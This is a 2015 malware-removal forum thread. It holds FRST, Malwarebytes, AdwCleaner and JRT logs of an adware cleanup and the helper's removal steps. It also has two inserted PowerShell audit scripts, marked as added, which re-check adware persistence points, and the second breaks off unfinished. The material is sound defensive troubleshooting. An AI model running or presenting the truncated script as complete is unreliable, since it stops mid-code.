C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi => Moved successfully.
C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan directory not found.
LiveUpdateSvc => Service deleted successfully.
C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 => Moved successfully.
"C:\WINDOWS\Tasks\miss_sunshine_notification_service.job" => File/Directory not found.
C:\WINDOWS\Tasks\oHBfPuiYh.job => Moved successfully.
"C:\WINDOWS\Tasks\miss_sunshine_updating_service.job" => File/Directory not found.
"C:\Program Files (x86)\miss sunshine" => File/Directory not found.
"C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service" => File/Directory not found.
C:\WINDOWS\System32\Tasks\oHBfPuiYh => Moved successfully.
"C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service" => File/Directory not found.
C:\Users\User\AppData\Roaming\oHBfPuiYh => Moved successfully.
C:\Program Files (x86)\Super Radio => Moved successfully.
C:\Program Files (x86)\globalUpdate => Moved successfully.
C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{17A02B50-2ACC-4619-879F-CAD3CA0637E6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{17A02B50-2ACC-4619-879F-CAD3CA0637E6}" => Key deleted successfully.
C:\Windows\System32\Tasks\oHBfPuiYh not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\oHBfPuiYh" => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} => Key not found.
C:\Windows\System32\Tasks\miss_sunshine_notification_service not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\miss_sunshine_notification_service => Key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B492C228-9821-4206-9375-CB872E57B430} => Key not found.
C:\Windows\System32\Tasks\miss_sunshine_updating_service not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\miss_sunshine_updating_service => Key not found.
C:\WINDOWS\Tasks\miss_sunshine_notification_service.job not found.
C:\WINDOWS\Tasks\miss_sunshine_updating_service.job not found.
C:\WINDOWS\Tasks\oHBfPuiYh.job not found.
"C:\Users\User\AppData\Roaming\oHBfPuiYh.exe" => File/Directory not found.
"C:\Users\User\Local Settings" => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS not found.
C:\Users\User\AppData\Local => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS removed successfully.
"C:\Users\User\AppData\Local\Application Data" => ":uX64zwMvt2ofvbwnRqkfi0gFk3" ADS not found.
"C:\Users\User\AppData\Local\Temporary Internet Files" => ":honRL14HPG0qKpaoTgpSHKJ" ADS not found.

The system needed a reboot.

==== End of Fixlog 23:36:41 ====
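The fixlist above is a compact catalogue of the places this adware hid: two Task Scheduler tasks plus their legacy .job twins in C:\WINDOWS\Tasks, an executable parked in AppData\Roaming under a random name, named alternate data streams on the profile's AppData\Local directory, a Firefox install-directory autoconfig pair (my.cfg and my-prefs.js, which override every profile), a stale BHO CLSID and a Chrome extension known only by its id. For readers who want to re-check those same spots without waiting on another full FRST run, the following PowerShell triage script is an added example: it is not part of this thread, not FRST output and not the fixlist Georgi supplied. It assumes Windows 8.1 with PowerShell 4 or later (the ScheduledTasks module) and an elevated prompt, and the rules it uses to flag a task target (runs from a user-writable root, target missing, no valid Authenticode signature) are this script's own heuristics, not anything FRST applies. It only reports; it deletes nothing.

```powershell
# Added triage script, not from this thread, from FRST or from the fixlist above: a read-only
# pass over the persistence points that fix touched (Task Scheduler tasks, legacy
# %windir%\Tasks\*.job files, alternate data streams on the profile, Firefox install-directory
# autoconfig files, Chrome extensions). Assumes Windows 8.1 / PowerShell 4+ and an elevated
# prompt (Get-ScheduledTask shows only part of the tree otherwise). Nothing here deletes.

$UserWritable = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:ProgramData) | Where-Object { $_ }

function Get-PathReason {
    # Heuristic (this script's assumption, not an FRST rule): flag a target that runs from a
    # user-writable root, is missing, or lacks a valid Authenticode signature; $null otherwise.
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $null }
    $exe = [Environment]::ExpandEnvironmentVariables($Path.Trim('"'))
    if ($exe -notmatch '[\\/]') {   # bare names such as powershell.exe resolve through PATH
        $cmd = Get-Command $exe -CommandType Application -ErrorAction SilentlyContinue | Select-Object -First 1
        if ($cmd) { $exe = $cmd.Path }
    }
    foreach ($root in $UserWritable) {
        if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
            return "runs from user-writable location ($root)"   # cf. AppData\Roaming\oHBfPuiYh.exe
        }
    }
    if (-not (Test-Path -LiteralPath $exe)) { return 'target missing (orphaned task)' }
    $sig = Get-AuthenticodeSignature -LiteralPath $exe -ErrorAction SilentlyContinue
    if (-not $sig -or $sig.Status -ne 'Valid') { return "no valid signature ($($sig.Status))" }
    return $null
}

function Get-SuspectTasks {
    # Task Scheduler 2.0 tasks (System32\Tasks plus the TaskCache registry keys).
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions)) {
            $reason = Get-PathReason $action.Execute
            if ($reason) {
                [pscustomobject]@{ Kind = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"
                                   Detail = "$($action.Execute) $($action.Arguments)".Trim(); Reason = $reason }
            }
        }
    }
}

function Get-LegacyJobs {
    # Old-style .job files, the form the miss_sunshine_* and oHBfPuiYh tasks also took.
    Get-ChildItem -LiteralPath "$env:windir\Tasks" -Filter *.job -File -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Kind = 'JobFile'; Name = $_.FullName
                                            Detail = "$($_.Length) bytes"; Reason = 'legacy .job file present' } }
}

function Get-ProfileStreams {
    # Named alternate data streams on profile directories, like the
    # :uX64zwMvt2ofvbwnRqkfi0gFk3 stream the fix removed from AppData\Local.
    foreach ($d in @($env:USERPROFILE, "$env:USERPROFILE\AppData", $env:APPDATA, $env:LOCALAPPDATA)) {
        Get-Item -LiteralPath $d -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -notin @(':$DATA', 'Zone.Identifier') } |
            ForEach-Object { [pscustomobject]@{ Kind = 'ADS'; Name = $d; Detail = $_.Stream
                                                Reason = "$($_.Length)-byte named stream on a directory" } }
    }
}

function Get-FirefoxAutoconfig {
    # Files in the install directory apply to every profile, which is how my.cfg and
    # browser\defaults\preferences\my-prefs.js hijacked this Firefox. channel-prefs.js is
    # shipped by Mozilla; anything else listed here needs an explanation.
    foreach ($ff in @("${env:ProgramFiles(x86)}\Mozilla Firefox", "$env:ProgramFiles\Mozilla Firefox")) {
        if (-not (Test-Path -LiteralPath $ff)) { continue }
        $files = @(Get-ChildItem -LiteralPath $ff -Filter *.cfg -File -ErrorAction SilentlyContinue)
        foreach ($sub in @('defaults\pref', 'browser\defaults\preferences')) {
            $files += @(Get-ChildItem -LiteralPath "$ff\$sub" -Filter *.js -File -ErrorAction SilentlyContinue)
        }
        foreach ($f in $files | Where-Object { $_.Name -ne 'channel-prefs.js' }) {
            [pscustomobject]@{ Kind = 'FirefoxAutoconfig'; Name = $f.FullName
                               Detail = "$($f.Length) bytes"; Reason = 'install-wide pref/autoconfig file' }
        }
    }
}

function Get-ChromeExtensions {
    # Every extension in the Default profile with the name from its manifest, so an id such as
    # didlppefmhmoiaeemeffjchbieeghlan can be read next to what it calls itself.
    # Names like __MSG_appName__ are localisation keys; look them up under _locales.
    $root = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
    if (-not (Test-Path -LiteralPath $root)) { return }
    Get-ChildItem -LiteralPath $root -Directory | ForEach-Object {
        $id = $_.Name
        Get-ChildItem -LiteralPath $_.FullName -Recurse -Filter manifest.json -File | ForEach-Object {
            $m = Get-Content -LiteralPath $_.FullName -Raw | ConvertFrom-Json
            [pscustomobject]@{ Kind = 'ChromeExt'; Name = $id
                               Detail = "$($m.name) $($m.version)"; Reason = 'installed extension' }
        }
    }
}

$findings = @(Get-SuspectTasks) + @(Get-LegacyJobs) + @(Get-ProfileStreams) +
            @(Get-FirefoxAutoconfig) + @(Get-ChromeExtensions)
$findings | Sort-Object Kind, Name | Format-Table Kind, Name, Reason, Detail -AutoSize -Wrap
```

Run it as the affected user from an elevated PowerShell and read the Task, JobFile and ADS rows against the fixlist entries above; a clean machine should show no JobFile rows, no named streams on the profile directories and no Firefox autoconfig file other than channel-prefs.js. The signature test will also flag legitimate unsigned software, so treat those rows as a list to verify rather than a verdict. Chrome rows are deliberately listed without judgement: the id alone says little, which is why the manifest name is put beside it.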



#10 ah_hin (Topic Starter, Members, 61 posts)

Posted 11 April 2015 - 01:42 AM

It seems like the problem has gone away.

No more pop-ups, and it's no longer redirecting me to random sites.

Does the log show that my computer is clean now?

Thanks!



#11 B-boy/StyLe/ (Bleepin' Freestyler, Malware Response Team, 8,307 posts, Bulgaria)

Posted 11 April 2015 - 04:32 AM

Hi,

Nice work! :)

Let's check for PUP leftovers:

STEP 1

Please download Malwarebytes Anti-Malware 2.1.4.1018 Final to your desktop.

  • Double-click mbam-setup-2.0.4.1028.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >>. If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart, once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

STEP 2

Please download AdwCleaner by Xplode and save it to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer.
  • After the scan has finished click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

STEP 3

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

That's it for now. :)

Regards,
Georgi


#12 ah_hin (Topic Starter, Members, 61 posts)

Posted 13 April 2015 - 12:59 AM

Hi, Chrome still has the problem, but Firefox and IE seem fine.

I have pasted the Malwarebytes log as requested below.

I will follow up with 2 more posts.
Thanks again for the help!

 

-------------------------------------------------------------------------------------------------------------

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 4/12/2015
Scan Time: 10:38:47 PM
Logfile:
Administrator: Yes

Version: 2.01.4.1018
Malware Database: v2015.04.13.02
Rootkit Database: v2015.03.31.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Enabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: User

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 416580
Time Elapsed: 11 min, 55 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Warn

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 4
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.selectgo00.selectgo.net_0.localstorage, Quarantined, [20f683e997f32a0c1c2016b510f351af],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.selectgo00.selectgo.net_0.localstorage-journal, Quarantined, [58bef577b0dad95d61db7d4e72919b65],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.select-n-go00.select-n-go.com_0.localstorage, Quarantined, [fa1ccaa21f6b52e45acc72847390a25e],
PUP.Optional.SelectNGo.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_static.select-n-go00.select-n-go.com_0.localstorage-journal, Quarantined, [4bcb026ae6a4d06637ef4fa790734cb4],

Physical Sectors: 0
(No malicious items detected)

(end)



#13 ah_hin (Topic Starter, Members, 61 posts)

Posted 13 April 2015 - 01:06 AM

AdwCleaner

--------------------------------------------------------------------------------------

# AdwCleaner v4.201 - Logfile created 12/04/2015 at 23:03:10
# Updated 08/04/2015 by Xplode
# Database : 2015-04-08.1 [Server]
# Operating system : Windows 8.1  (x64)
# Username : User - GIGABYTE
# Running from : C:\Users\User\Desktop\Malware software\adwcleaner_4.201.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\baidu
Folder Deleted : C:\ProgramData\Innovative Solutions
Folder Deleted : C:\Program Files (x86)\Innovative Solutions
Folder Deleted : C:\Program Files (x86)\Common Files\Innovative Solutions
Folder Deleted : C:\Users\User\AppData\Local\Temp\baidu
Folder Deleted : C:\Users\User\AppData\Local\globalUpdate
Folder Deleted : C:\Users\User\AppData\Local\Innovative Solutions
Folder Deleted : C:\Users\User\AppData\LocalLow\baidu
Folder Deleted : C:\Users\User\AppData\Roaming\baidu
Folder Deleted : C:\Users\User\AppData\Roaming\RHEng
Folder Deleted : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\magicplayer@acestream.org
Folder Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhnkgpdlogbknkhlgdjlejeljbhflim
File Deleted : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\YouTubeAutoReplay@arikv.com.xpi
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mfhnkgpdlogbknkhlgdjlejeljbhflim_0.localstorage
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mfhnkgpdlogbknkhlgdjlejeljbhflim_0.localstorage-journal
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage-journal
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.reimageplus.com_0.localstorage
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.reimageplus.com_0.localstorage-journal

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass.1
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
Key Deleted : HKLM\SOFTWARE\1330afbb-8c11-4d38-90d6-a699e10457fe
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550655795577}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660666796677}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550655795577}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660666796677}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\GlobalUpdate
Key Deleted : HKCU\Software\Baidu
Key Deleted : HKCU\Software\AceStream
Key Deleted : HKCU\Software\AppDataLow\Software\Super Radio
Key Deleted : HKLM\SOFTWARE\GlobalUpdate
Key Deleted : HKLM\SOFTWARE\Uniblue
Key Deleted : HKLM\SOFTWARE\Baidu
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AceStream
Key Deleted : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17416

-\\ Mozilla Firefox v37.0.1 (x86 en-US)

-\\ Google Chrome v41.0.2272.118

[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : mfhnkgpdlogbknkhlgdjlejeljbhflim

*************************

AdwCleaner[R0].txt - [8255 bytes] - [12/04/2015 22:58:51]
AdwCleaner[R1].txt - [8314 bytes] - [12/04/2015 23:01:06]
AdwCleaner[S0].txt - [8226 bytes] - [12/04/2015 23:03:10]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8285  bytes] ##########



#14 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • Local time:08:16 AM

Posted 13 April 2015 - 01:13 AM

Last one from JRT:

-----------------------------------------------------------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.5.3 (04.07.2015:1)
OS: Windows 8.1 x64
Ran by User on Sun 04/12/2015 at 23:08:19.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

 

~~~ Files

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\flexnet"

 

~~~ FireFox

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@baidu.com/npxbdsetup
Successfully deleted the following from C:\Users\User\AppData\Roaming\mozilla\firefox\profiles\8qz11wfm.default\prefs.js

user_pref("browser.newtabpage.pinned", "[{\"url\":\"hxxps://www.google.com/\",\"title\":\"Google\"},{\"url\":\"hxxp://espn.go.com/\",\"title\":\"ESPN: The Worldwide Leader In
Emptied folder: C:\Users\User\AppData\Roaming\mozilla\firefox\profiles\8qz11wfm.default\minidumps [21 files]

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 04/12/2015 at 23:11:54.73
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
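The AdwCleaner log in #13 and the JRT log above record deletions under the IE Browser Helper Objects and Extensions keys, the Low Rights ElevationPolicy, the WinINet ProxyOverride value, Chrome's Secure Preferences extension list and Firefox prefs.js. The PowerShell below is an added example, not part of this thread and not code from AdwCleaner or JRT: it only reads those same locations again, so the cleanup can be confirmed after the reboot. The Chrome Default profile under %LOCALAPPDATA%, the Firefox profile folder under %APPDATA%, the Add-Finding helper and the list of Firefox prefs worth watching are assumptions of this example.

```powershell
# Added example (not from this thread, AdwCleaner or JRT): a read-only audit of
# the persistence points the two logs above report deleting, so the cleanup can be
# re-checked after a reboot. Assumes PowerShell 3.0+ (for ConvertFrom-Json), the
# default Chrome profile under %LOCALAPPDATA% and Firefox profiles under %APPDATA%;
# run from an elevated prompt so the HKLM keys and the DLLs can be read.

$findings = New-Object 'System.Collections.Generic.List[object]'
function Add-Finding($Area, $Entry, $Detail) {
    $findings.Add([pscustomobject]@{ Area = $Area; Entry = $Entry; Detail = $Detail })
}

# 1. IE Browser Helper Objects, extension registrations and Low Rights
#    ElevationPolicy entries, in both the native and the WOW6432Node views.
$ieKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\Extensions',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions',
    'HKCU:\Software\Microsoft\Internet Explorer\Extensions',
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy'
)
$clsidRoots = @('HKLM:\SOFTWARE\Classes\CLSID',
                'HKLM:\SOFTWARE\Classes\WOW6432Node\CLSID',
                'HKCU:\Software\Classes\CLSID')
foreach ($key in $ieKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    foreach ($sub in Get-ChildItem -LiteralPath $key) {
        $props  = Get-ItemProperty -LiteralPath $sub.PSPath
        $target = $null
        if ($props.AppPath) {
            # ElevationPolicy entries name a program (AppPath\AppName), not a COM class.
            $target = Join-Path $props.AppPath ([string]$props.AppName)
        } else {
            # Resolve the CLSID to the DLL IE would actually load.
            foreach ($root in $clsidRoots) {
                $srv = Join-Path $root ($sub.PSChildName + '\InprocServer32')
                if (Test-Path -LiteralPath $srv) {
                    $target = (Get-ItemProperty -LiteralPath $srv).'(default)'
                    break
                }
            }
        }
        $sig = 'n/a'
        if ($target) {
            $file = [Environment]::ExpandEnvironmentVariables(([string]$target).Trim('"'))
            if (Test-Path -LiteralPath $file) {
                $sig = (Get-AuthenticodeSignature -FilePath $file).Status
            } else {
                # Dangling registration: the file is gone but the key survived the cleanup.
                $sig = 'file missing'
            }
        }
        Add-Finding 'IE' "$key\$($sub.PSChildName)" ("target={0}; signature={1}" -f $target, $sig)
    }
}

# 2. WinINet proxy settings; adware that rewrites pages often routes traffic
#    through a local proxy or a PAC file configured here.
$inet = Get-ItemProperty -LiteralPath 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
foreach ($name in 'ProxyEnable', 'ProxyServer', 'ProxyOverride', 'AutoConfigURL') {
    if ("$($inet.$name)" -ne '') { Add-Finding 'Proxy' $name "$($inet.$name)" }
}

# 3. Extensions Chrome has installed for the Default profile (Secure Preferences).
$securePrefs = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Secure Preferences'
if (Test-Path -LiteralPath $securePrefs) {
    $prefs = Get-Content -LiteralPath $securePrefs -Raw | ConvertFrom-Json
    if ($prefs.extensions -and $prefs.extensions.settings) {
        foreach ($ext in $prefs.extensions.settings.PSObject.Properties) {
            $v    = $ext.Value
            $name = if ($v.manifest) { $v.manifest.name } else { '' }
            # Anything not from the Web Store, or loaded from an odd path, deserves a look.
            Add-Finding 'Chrome' $ext.Name ("name={0}; from_webstore={1}; path={2}" -f $name, $v.from_webstore, $v.path)
        }
    }
}

# 4. Firefox prefs.js entries that control search, home page, new tab and proxy
#    (the watch list is this example's choice, not a Firefox-defined set).
$watch = '^(browser\.startup\.homepage|browser\.search\.|browser\.newtabpage\.|keyword\.URL|network\.proxy\.|extensions\.enabledAddons)'
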